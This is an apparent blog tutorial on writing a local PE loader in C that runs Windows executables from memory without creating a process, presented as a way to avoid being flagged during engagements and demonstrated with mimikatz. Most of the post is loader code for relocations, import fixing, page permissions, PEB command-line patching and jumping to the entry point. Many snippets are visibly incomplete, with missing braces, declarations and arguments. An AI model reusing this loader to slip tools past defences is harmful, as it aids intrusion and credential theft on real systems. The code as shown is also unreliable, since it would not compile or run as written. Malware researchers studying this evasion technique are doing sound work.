Writing a local PE Loader from scratch (for educational purposes)

Sohail Saha
16 min readDec 1, 2024


totally not sus cake

When you execute a PE file, it gets loaded from disk, and a new process gets associated with it. The downside is, dropping an executable and creating a new process with it is very likely to get you flagged during an engagement if the executable is known.

Unlike the Windows loader, a custom PE loader can load a PE from its own memory without even launching an associated process for it. This post will take you through the whole loading process, explaining all the concepts needed to understand it.

How a PE loader works in theory

A PE is just a file on disk. To get it running, it’s not enough to just read it into an executable memory and jump to its entry.

This is because a PE file and a PE image has differences between them. A PE image is the in-memory representation of a PE file on disk. When you execute a PE file, a PE image is first prepared. It is this image that is executed.

A PE image is structurally different than a PE file - different data is situated at different offsets, plus, there are data that are image-only. A PE loader takes care of creating the PE image structure from a PE file on disk. The below section will explain and walk you through each individual step of PE loading, along with code, such that in the end we’re left with a fully functioning loader.

Writing a local PE loader

We will start straight with writing the loader. Along the way, I will explain everything relevant about each step, both conceptually and with code. The objective is to write a loader that loads and executes any EXE locally, i.e, within its own process. I chose mimikatz for my demo. Feel free to choose anything.

Creating a buffer for in-mem PE

First, we need to create a buffer and store the executable image file raw data in it. In a real scenario, our loader would act like a stager, and remotely fetch this raw data. My example loader, however, will only read the executable from disk, which although defeats the objective of “in-memory executable” for this example, but keeps things simple.

So, first things first, we need to read the PE file from disk. For this, we open a handle to the file, get its size, then reserve a buffer on heap for this. Then we read in the file into this buffer.

This buffer would be used from now on to read the actual PE file.

DWORD64 ReadImageFile(IN PCHAR imagePath, OUT LPVOID* pBufImageFile) {
*pBufImageFile = NULL;

// Read image file
if (hImageFile == INVALID_HANDLE_VALUE) {
goto _CLEANUP;

LARGE_INTEGER imageFileSize = {0};
ZeroMemoryCustom(&imageFileSize, sizeof(imageFileSize));
GetFileSizeEx(hImageFile, &imageFileSize);
if (imageFileSize.QuadPart == 0) {
goto _CLEANUP;

*pBufImageFile = VirtualAlloc(NULL, imageFileSize.QuadPart, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
if (*pBufImageFile == NULL) {
goto _CLEANUP;

DWORD numOfBytesRead = 0;
if ((!ReadFile(hImageFile, *pBufImageFile, imageFileSize.QuadPart, &numOfBytesRead, NULL)) || (numOfBytesRead != imageFileSize.QuadPart)) {
goto _CLEANUP;

if (hImageFile != INVALID_HANDLE_VALUE) {
return imageFileSize.QuadPart;

Processing the PE file

Now that we have the PE file read in a buffer, we can start extracting useful data from it. This data will help our loader. Below is a diagram of the structure of a PE.

Source: tech-zealots.com

The beginning of a PE file contains metadata for the rest of the file. This metadata is in the “File header” and the “Optional header”, both of which are a part of “Nt headers”. This is followed by “Section headers”, which contain metadata for each “Section” of a PE. A “Section” is a region serving a particular purpose for a PE. For an in-depth look into the PE structure, read: https://learn.microsoft.com/en-us/windows/win32/debug/pe-format.

So what our loader first needs to do, is to parse all the above metadata that the loading logic would need. With this metadata, the loader can access specific parts of the PE file, and copy them over to the appropriate offsets in the PE image. This metadata will also help in knowing what sorts of modification to make to parts of the PE image to make it ready for execution.

To store this metadata, a struct would be used. This struct would later be consulted by each individual step in the loader.

typedef struct _PEImageFileProcessed {

DWORD64 ImageBase; // absolute
DWORD SizeOfImage;
DWORD AddressOfEntryPointOffset; // relative

WORD NumOfSections;
PIMAGE_SECTION_HEADER SectionHeaderFirst; // absolute

PIMAGE_DATA_DIRECTORY pDataDirectoryException;
} PEImageFileProcessed, * PPEImageFileProcessed;

And now, to populate this struct ,

BOOL ProcessPEFile(IN LPVOID pBufImageFile, OUT PPEImageFileProcessed pPeImageFileProcessed) {
// Process headers
PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)((DWORD64)pBufImageFile + (pDosHeader->e_lfanew));
if (!(pNtHeaders->FileHeader.Characteristics & IMAGE_FILE_EXECUTABLE_IMAGE)) {
printf("ProcessPEFile; input file is not a PE\n");
return FALSE;

pPeImageFileProcessed->FileHeader = pNtHeaders->FileHeader;
pPeImageFileProcessed->OptionalHeader = pNtHeaders->OptionalHeader;

// Process misc
pPeImageFileProcessed->IsDll = (pNtHeaders->FileHeader.Characteristics & IMAGE_FILE_DLL) ? TRUE : FALSE;
pPeImageFileProcessed->SizeOfImage = pNtHeaders->OptionalHeader.SizeOfImage;
pPeImageFileProcessed->ImageBase = pNtHeaders->OptionalHeader.ImageBase;
pPeImageFileProcessed->AddressOfEntryPointOffset = pNtHeaders->OptionalHeader.AddressOfEntryPoint;

// Process section headers
pPeImageFileProcessed->NumOfSections = pNtHeaders->FileHeader.NumberOfSections;
pPeImageFileProcessed->SectionHeaderFirst = IMAGE_FIRST_SECTION(pNtHeaders);

// Process required sections explicitly
pPeImageFileProcessed->pDataDirectoryExport = &(pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]);
pPeImageFileProcessed->pDataDirectoryImport = &(pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT]);
pPeImageFileProcessed->pDataDirectoryReloc = &(pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC]);
pPeImageFileProcessed->pDataDirectoryException = &(pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION]);

return TRUE;

Each metadata information is stored under a self-explanatory variable name. However, they would also be further explained as and when needed.

Allocate space for in-mem PE

Firstly, we need to allocate some buffer to hold our loaded in-mem PE image. The metadata information we saved earlier will help us in this. The SizeOfImage stores the size (in bytes) of the PE image in memory. This is larger than the size of the PE file itself. One of the reasons is that, a PE image is much more than just the PE file.

This buffer must be entirely readwritable for now.

void AllocateMemoryForInMemPE(IN DWORD SizeOfImage, OUT LPVOID* pBufInMemPE) {
if (*pBufInMemPE == NULL) {
PrintError("VirtualAlloc for AllocateMemoryForInMemPE");

AllocateMemoryForInMemPE(peImageFileProcessed.SizeOfImage, &pBufInMemPE); // read the SizeOfImage from parsed metadata

Copying over PE sections to the in-mem PE buffer

Next step, copying over the actual sections from the PE file to the PE image. Of course, the sections in a PE image are not the exact same as the sections of a PE file — the data stored in the PE image sections is often the result of some sort of modifications made to corresponding data in the PE file sections.

This means that simply copying over individual sections to the PE image buffer is not enough; there needs to be several modifications made to it once it’s been copied. So first, we must copy over each section to its respective offsets in the PE image. In later steps, we will modify this copy.

void CopySectionsToInMemPE(IN PPEImageFileProcessed pPeImageFileProcessed, IN LPVOID pBufImageFile, OUT LPVOID pBufInMemPE) {
for (int i = 0; i < pPeImageFileProcessed->NumOfSections; i++) {
IMAGE_SECTION_HEADER SectionHeader = pPeImageFileProcessed->SectionHeaderFirst[i];

(DWORD64)pBufInMemPE + SectionHeader.VirtualAddress,
(DWORD64)pBufImageFile + SectionHeader.PointerToRawData,

For this, NumOfSections contains the total number of sections, and SectionHeaderFirst is a pointer to the first section header. Each section in the PE file has an associated section header that describes the offset and size of the section. Section headers are stored in an array of IMAGE_SECTION_HEADER structs.

The logic is simple — iterate over each section header, parse the offset and size of the section it represents, then copy SizeOfRawData number of bytes from the PE file (pBufImageFile)’s offset PointerToRawData to PE image (pBufInMemPE)’s offset VirtualAddress .

Unless otherwise stated, every “address” metadata you find in a PE will always be a Relative address, meaning that it is an offset, and needs to be added to the PE base address to get the actual address. In the above snippet, PointerToRawData and VirtualAddress are such offsets.

Performing relocations

A PE image is supposed to be loaded at a particular absolute virtual address. This is represented by the ImageBase metadata we parsed. However, this happens rarely.

This ImageBase is important, because the compiler will often put in hardcoded addresses and offsets in the generated PE. These values depend upon the loader loading the PE at exactly ImageBase . Since this won’t likely happen, the compiler also includes something called “Relocation” data in the .reloc section.

Relocation data instructs the PE loader on how to fix those hardcoded addresses at runtime so that they work even when the image is not loaded at ImageBase . An example, say the ImageBase is 0x40000, and a particular hardcoded address is 0x40102. If the loader loads the image at 0x50000, the hardcoded address needs to be increased by 0x10000 (actual base — suggested base, i.e, 0x50000–0x40000). The .reloc section contains exactly this information — where to add the offset, and how to add the offset, such that 0x40102 becomes 0x50102.

Relocation data is pointed to by our metadata pDataDirectoryReloc.VirtualAddress (recall that this needs to be added to the PE image base to get the actual address).

The relocation data is stored in consecutive blocks of IMAGE_BASE_RELOCATION structs. Each of these blocks store 2 things — metadata of the base memory block where the relocation is supposed to happen (this metadata is always of fixed size), and an array of IMAGE_BASE_RELOCATION_ENTRY structs that contain metadata for each individual relocation, i.e, the offset that needs to be added to the base memory block to get the actual target address, and the type of relocation.

In other words, there is one relocation that needs to be performed per IMAGE_BASE_RELOCATION_ENTRY . The relocation needs to be performed at pBufInMemPE + IMAGE_BASE_RELOCATION.VirtualAddress + IMAGE_BASE_RELOCATION_ENTRY.Offset address. And the relocation type is IMAGE_BASE_RELOCATION_ENTRY.Type .

IMAGE_BASE_RELOCATION.SizeOfBlock is the total size of each block, which includes the aforementioned metadata, and the array of IMAGE_BASE_RELOCATION_ENTRY . This size is variable, because the number of IMAGE_BASE_RELOCATION_ENTRY is variable. Therefore, the address of the first relocation entry is IMAGE_BASE_RELOCATION + sizeof(IMAGE_BASE_RELOCATION) (because the sizeof here reports only the size of the fixed metadata, and does not include the array of entries that follow).

IMAGE_BASE_RELOCATION block, containing metadata and array of IMAGE_BASE_RELOCATION_ENTRY

The type of relocation is mentioned by IMAGE_BASE_RELOCATION_ENTRY.Type . The types we are interested in, are for x86 and x64. The type will tell us how to add the image base difference (ImageBasepBufInMemPE) to the address mentioned.

  • IMAGE_REL_BASED_HIGH : The base relocation adds the high 16 bits of the difference to the 16-bit field at offset. The 16-bit field represents the high value of a 32-bit word.
  • IMAGE_REL_BASED_LOW : The base relocation adds the low 16 bits of the difference to the 16-bit field at offset. The 16-bit field represents the low half of a 32-bit word.
  • IMAGE_REL_BASED_HIGHLOW : The base relocation applies all 32 bits of the difference to the 32-bit field at offset.
  • IMAGE_REL_BASED_DIR64 : The base relocation applies the difference to the 64-bit field at offset.
  • IMAGE_REL_BASED_ABSOLUTE : The base relocation is skipped. This type can be used to pad a block.

Putting it all together, here’s what the relocation looks like:

WORD Offset : 12;
WORD Type: 4;

void PerformRelocationForInMemPE(IN PPEImageFileProcessed pPeImageFileProcessed, OUT LPVOID pBufInMemPE) {
PIMAGE_BASE_RELOCATION pImageBaseRelocation = (PIMAGE_BASE_RELOCATION)((DWORD64)pBufInMemPE + pPeImageFileProcessed->pDataDirectoryReloc->VirtualAddress);
DWORD NumImageBaseRelocationEntry = NULL;
DWORD64 relocOffset = (DWORD64)pBufInMemPE - pPeImageFileProcessed->ImageBase;
DWORD64 relocAt = NULL;

// For each Base Relocation Block
while (pImageBaseRelocation->VirtualAddress != NULL) {
NumImageBaseRelocationEntry = (pImageBaseRelocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(IMAGE_BASE_RELOCATION_ENTRY);
pImageBaseRelocationEntry = (PIMAGE_BASE_RELOCATION_ENTRY)((DWORD64)pImageBaseRelocation + sizeof(IMAGE_BASE_RELOCATION));
relocAt = NULL;

// For each Base Relocation Block Entry
for (int i = 0; i < NumImageBaseRelocationEntry; i++) {
relocAt = ADD_OFFSET_TO_POINTER(pBufInMemPE, pImageBaseRelocation->VirtualAddress + pImageBaseRelocationEntry[i].Offset);

switch (pImageBaseRelocationEntry[i].Type) {
case IMAGE_REL_BASED_HIGH: // The base relocation adds the high 16 bits of the difference to the 16-bit field at offset. The 16-bit field represents the high value of a 32-bit word.
*(PWORD)relocAt += HIWORD(relocOffset);
case IMAGE_REL_BASED_LOW: // The base relocation adds the low 16 bits of the difference to the 16-bit field at offset. The 16-bit field represents the low half of a 32-bit word.
*(PWORD)relocAt += LOWORD(relocOffset);
case IMAGE_REL_BASED_HIGHLOW: // The base relocation applies all 32 bits of the difference to the 32-bit field at offset.
*(PDWORD)relocAt += (DWORD)relocOffset;
case IMAGE_REL_BASED_DIR64: // The base relocation applies the difference to the 64-bit field at offset.
*(PDWORD64)relocAt += relocOffset;
case IMAGE_REL_BASED_ABSOLUTE: // The base relocation is skipped. This type can be used to pad a block.

// Move on to next relocation block
pImageBaseRelocation = ADD_OFFSET_TO_POINTER(pImageBaseRelocation, pImageBaseRelocation->SizeOfBlock);

Fixing imports

Next, we’re about to fix the imports. A dynamically-linked PE will import functions from other modules, such as system DLLs. This import information is stored in the .idata section, in arrays of IMAGE_IMPORT_DESCRIPTOR structs.

Each IMAGE_IMPORT_DESCRIPTOR represents one library. Each function that need to be imported from this library are in IMAGE_THUNK_DATA structs, pointed to by IMAGE_IMPORT_DESCRIPTOR.OriginalFirstThunk . This thunk data contains either the ordinal of the function (.Ordinal) or the name of the function (.AddressOfData).

The function addresses found are to be added in corresponding IMAGE_THUNK_DATA structs, pointed to by IMAGE_IMPORT_DESCRIPTOR.FirstThunk . Yes, we use OriginalFirstThunk to locate the function, and store the found functions in FirstThunk .

To know whether we are to use the ordinal or name of the function, we check the bitfields of the ordinal, and check if it matches IMAGE_ORDINAL_FLAG . So all we need to check is if IMAGE_THUNK_DATA.u1.Ordinal & IMAGE_ORDINAL_FLAG is zero. If it is zero, we use the function name. If non-zero, we use the ordinal.

The function name is stored in a IMAGE_IMPORT_BY_NAME struct, pointed to by IMAGE_THUNK_DATA.u1.AddressOfData .

With the ordinal or name, we can use GetProcAddress to locate the address of the function we need. Once done, we set this address in the corresponding IMAGE_THUNK_DATA struct pointed to by IMAGE_IMPORT_DESCRIPTOR.FirstThunk.

In other words, here’s the steps needed to resolve the second function of the third library:

  1. Access IMAGE_THUNK_DATA at IMAGE_IMPORT_DESCRIPTOR[2].OriginalFirstThunk[1] , and use the ordinal or the name to locate the function.
  2. Access IMAGE_THUNK_DATA at IMAGE_IMPORT_DESCRIPTOR[2].FirstThunk[1] and set the above found function address at .Function .

The code for the above would look like this:

BOOL FixImportsForInMemPE(IN PPEImageFileProcessed pPeImageFileProcessed, OUT LPVOID pBufInMemPE) {
PIMAGE_IMPORT_DESCRIPTOR pImageImportDescriptor = ADD_OFFSET_TO_POINTER(pBufInMemPE, pPeImageFileProcessed->pDataDirectoryImport->VirtualAddress);
PCHAR dllName = NULL;
PIMAGE_THUNK_DATA pOriginalFirstThunk = NULL;
BOOL isOrdinal = FALSE;
PIMAGE_IMPORT_BY_NAME pImageImportByName = { 0 };
LPVOID funcAddress = NULL;

// Iterate through Image Import Descriptors
while (pImageImportDescriptor->FirstThunk != NULL && pImageImportDescriptor->OriginalFirstThunk != NULL) {
// Get module handle to required DLL; load if not already loaded
dllName = ADD_OFFSET_TO_POINTER(pBufInMemPE, pImageImportDescriptor->Name);
hModule = GetModuleHandleA(dllName);
if (hModule == INVALID_HANDLE_VALUE || hModule == NULL) {
hModule = LoadLibraryA(dllName);
if (hModule == INVALID_HANDLE_VALUE || hModule == NULL) {
return FALSE;

// Iterate through each Thunk
pOriginalFirstThunk = ADD_OFFSET_TO_POINTER(pBufInMemPE, pImageImportDescriptor->OriginalFirstThunk);
pFirstThunk = ADD_OFFSET_TO_POINTER(pBufInMemPE, pImageImportDescriptor->FirstThunk);
funcAddress = NULL;
while (pOriginalFirstThunk->u1.Function != NULL && pFirstThunk->u1.Function) {
isOrdinal = ((pOriginalFirstThunk->u1.Ordinal & IMAGE_ORDINAL_FLAG) == 0) ? FALSE : TRUE;

// Get the function address
if (isOrdinal) {
funcAddress = GetProcAddress(hModule, IMAGE_ORDINAL(pOriginalFirstThunk->u1.Ordinal));
else {
pImageImportByName = ADD_OFFSET_TO_POINTER(pBufInMemPE, pOriginalFirstThunk->u1.AddressOfData);
funcAddress = GetProcAddress(hModule, pImageImportByName->Name);
if (funcAddress == NULL) {
return FALSE;

// Set found function address
pFirstThunk->u1.Function = funcAddress;

// Move on to next thunk

// Move on to next Image Import Descriptor

return TRUE;

Registering exception handlers

Next, we need to fix the exception handlers. Stored in the .pdata section is a function table for exception handlers. Each entry of this table is a RUNTIME_FUNCTION struct.

Fortunately for us, there exists a function to register this table — RtlAddFunctionTable . All we need to do is pass it a reference to the exception handlers function table, and it takes care of the rest.

BOOL RegisterExceptionHandlers(IN PPEImageFileProcessed pPeImageFileProcessed, OUT LPVOID pBufInMemPE) {
if (pPeImageFileProcessed->pDataDirectoryException->VirtualAddress != NULL) {
PRUNTIME_FUNCTION pFunctionTable = ADD_OFFSET_TO_POINTER(pBufInMemPE, pPeImageFileProcessed->pDataDirectoryException->VirtualAddress);
if (!RtlAddFunctionTable(
pFunctionTable, // Pointer to exception function table
(pPeImageFileProcessed->pDataDirectoryException->Size / sizeof(RUNTIME_FUNCTION)), // Number of RUNTIME_FUNCTIONs in the table
pBufInMemPE // Base of the in-mem PE
)) {
return FALSE;
else {
return TRUE;

Assigning correct permissions to the sections

Next step is to assign correct memory access permissions to the sections. If you recall, we set the entire pBufInMemPE as RW initially. However, not all sections are RW . Some are R, others are RX .

Each section’s header has a .Characteristics bitfield that stores the correct access permission. To check with access permission is denoted, do SectionHeader.Characteristics & BITFIELD_FLAG and see if it’s non-zero. For example, if we get SectionHeader.Characterists & IMAGE_SCN_MEM_READ as non-zero, but that with IMAGE_SCN_MEM_WRITE and IMAGE_SCN_MEM_EXECUTE as zero, it means the section is readable, but neither writable nor executable. So the page permission would be PAGE_READONLY.

Therefore, all we need to do is iterate over each section header, check the .Characteristics property, get the correct permission, then assign it to the section using VirtualProtect .

BOOL AssignCorrectPagePerms(IN PPEImageFileProcessed pPeImageFileProcessed, OUT LPVOID pBufInMemPE) {
IMAGE_SECTION_HEADER SectionHeader = {0};
DWORD newProtection = NULL, oldProtection = NULL;

// Iterate through each Section header
for (int i = 0; i < pPeImageFileProcessed->NumOfSections; i++) {
SectionHeader = pPeImageFileProcessed->SectionHeaderFirst[i];

// Get correct permission to set
if ((SectionHeader.Characteristics & IMAGE_SCN_MEM_EXECUTE) && !(SectionHeader.Characteristics & IMAGE_SCN_MEM_READ) && !(SectionHeader.Characteristics & IMAGE_SCN_MEM_WRITE)) {
newProtection = PAGE_EXECUTE;
else if ((SectionHeader.Characteristics & IMAGE_SCN_MEM_EXECUTE) && (SectionHeader.Characteristics & IMAGE_SCN_MEM_READ) && !(SectionHeader.Characteristics & IMAGE_SCN_MEM_WRITE)) {
newProtection = PAGE_EXECUTE_READ;
else if ((SectionHeader.Characteristics & IMAGE_SCN_MEM_EXECUTE) && (SectionHeader.Characteristics & IMAGE_SCN_MEM_READ) && (SectionHeader.Characteristics & IMAGE_SCN_MEM_WRITE)) {
else if (!(SectionHeader.Characteristics & IMAGE_SCN_MEM_EXECUTE) && (SectionHeader.Characteristics & IMAGE_SCN_MEM_READ) && !(SectionHeader.Characteristics & IMAGE_SCN_MEM_WRITE)) {
newProtection = PAGE_READONLY;
else if (!(SectionHeader.Characteristics & IMAGE_SCN_MEM_EXECUTE) && (SectionHeader.Characteristics & IMAGE_SCN_MEM_READ) && (SectionHeader.Characteristics & IMAGE_SCN_MEM_WRITE)) {
newProtection = PAGE_READWRITE;
else {
return FALSE;

// Set correct permission
if (!VirtualProtect(
ADD_OFFSET_TO_POINTER(pBufInMemPE, SectionHeader.VirtualAddress),
)) {
return FALSE;
return TRUE;

Fixing commandline

Next up is fixing commandline. If we don’t do this, and move on to executing the in-mem PE, the commandline that it would see is the commandline we passed to our loader. That’s not what we want. What we want, is for the in-mem PE to see the custom commandline that we provide.

A PE gets its commandline from its current process’s PEB. The PEB is an object that stores information about a process. In this case, since we don’t create a new process, but rather load the PE in our current process, the in-mem PE would access our (the loader’s) PEB.

To make sure the in-mem PE gets the correct commandline, we need to modify our PEB, specifically the .ProcessParameters , which is a RTL_USER_PROCESS_PARAMETERS struct. This contains .CommandLine and .ImagePathName , each of which is a UNICODE_STRING struct. The .ImagePathName is of the form C:\path\to\executable.exe , whereas the .CommandLine is of the form "C:\path\to\executable.exe" param1 param2 .

An executable’s entry point code always receives a pointer to the arguments passed to the program, often denoted by char* argv[] . In the above example, argv[0] would point to "C:\path\to\executable.exe" , argv[1] would point to param1 , and so on. This is prepared from PEB.ProcessParameters.CommandLine .

Therefore, all we need to do is to patch .CommandLine , such that it looks like what the in-mem PE’s actual commandline would look like. The "C:\path\to\executable.exe" part can be anything, since process arguments argv[n] start pointing only to what’s after it, i.e, from param1 .

To first get the PEB , read off the GS register, which holds the address of the TEB , which represents a thread. Each TEB contains a pointer to the PEB of the process that the thread belongs to.

The below code achieves all this. pInMemPeArgs is a pointer to a string like param1 param2 , that is, a single string containing parameters separated by space.

PPEB GetCurrentPEB() {
#ifdef _M_X64
return (PPEB)__readgsqword(12 * sizeof(PVOID));
return (PPEB)__readfsdword(12 * sizeof(PVOID));

void FixCommandLine(PProcessParametersStore pProcessParamsStore, PCHAR pInMemPeArgs) {
// Get current PE's command-line args
PPEB pPeb = GetCurrentPEB();

// Save original command line
ZeroMemoryCustom(pProcessParamsStore, sizeof(ProcessParametersStore));
pProcessParamsStore->commandlineLenOrig = pPeb->ProcessParameters->CommandLine.Length;
pProcessParamsStore->commandlineOrig = VirtualAlloc(NULL, pPeb->ProcessParameters->CommandLine.Length, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
if (pProcessParamsStore->commandlineOrig != NULL) {
MemCpy(pProcessParamsStore->commandlineOrig, pPeb->ProcessParameters->CommandLine.Buffer, pPeb->ProcessParameters->CommandLine.Length);

// If there are no command line args to be passed to the in-mem PE
if (pInMemPeArgs == NULL) {
pPeb->ProcessParameters->CommandLine.Length = 0;
pPeb->ProcessParameters->CommandLine.MaximumLength = 0;
ZeroMemoryCustom(pPeb->ProcessParameters->CommandLine.Buffer, pProcessParamsStore->commandlineLenOrig);
// If there are command line args to be passed to the in-mem PE
else {
// Prepare new command line
DWORD inMemPeArgsWLen = pPeb->ProcessParameters->ImagePathName.Length + (StrLen(pInMemPeArgs) * sizeof(WCHAR)) + (3 * sizeof(WCHAR)); // Image file path + args to in-mem PE + null terminator + 2 double-quotes + one space
if (pInMemPeArgsW == NULL) return;
ZeroMemoryCustom(pInMemPeArgsW, inMemPeArgsWLen);
MemCpy(pInMemPeArgsW + 0, L"\"", 1);
MemCpy(pInMemPeArgsW + 1, pPeb->ProcessParameters->ImagePathName.Buffer, pPeb->ProcessParameters->ImagePathName.Length);
MemCpy(pInMemPeArgsW + (pPeb->ProcessParameters->ImagePathName.Length / 2) + 1, L"\"", 1);
MemCpy(pInMemPeArgsW + (pPeb->ProcessParameters->ImagePathName.Length / 2) + 2, L" ", 1);
CharStringToWCharString(pInMemPeArgs, StrLen(pInMemPeArgs), pInMemPeArgsW + (pPeb->ProcessParameters->ImagePathName.Length / 2) + 3);

// Set new command line len
pPeb->ProcessParameters->CommandLine.Length = inMemPeArgsWLen;
pPeb->ProcessParameters->CommandLine.MaximumLength = inMemPeArgsWLen;

// Set new command line
ZeroMemoryCustom(pPeb->ProcessParameters->CommandLine.Buffer, pProcessParamsStore->commandlineLenOrig);
MemCpy(pPeb->ProcessParameters->CommandLine.Buffer, pInMemPeArgsW, inMemPeArgsWLen);
ZeroMemoryCustom(pInMemPeArgsW, inMemPeArgsWLen);
VirtualFree(pInMemPeArgsW, 0, MEM_RELEASE);

Jump to entry

At this point, our in-mem PE is loaded, and ready to be executed.

All we need to do, is find out whether the PE is a DLL or not, and execute the .AddressOfEntryPointOffset relative address accordingly.


void JumpToEntry(IN PPEImageFileProcessed pPeImageFileProcessed, IN LPVOID pBufInMemPE) {
LPVOID pEntry = ADD_OFFSET_TO_POINTER(pBufInMemPE, pPeImageFileProcessed->AddressOfEntryPointOffset);
// For DLL
if (pPeImageFileProcessed->IsDll) {
((DLLMAIN)pEntry)(pBufInMemPE, DLL_PROCESS_ATTACH, NULL); // dllmain of DLL
// For other executables
else {
((MAIN)pEntry)(1, NULL); // main of any other executable
Executing mimikatz locally

Entire Code

The entire code for this loader is available on my malware-study repo, where I put all my code for my malware research.




Sohail Saha
Sohail Saha

Written by Sohail Saha

Security Engineer | OSCP, CRTO, CPTS, CDSA

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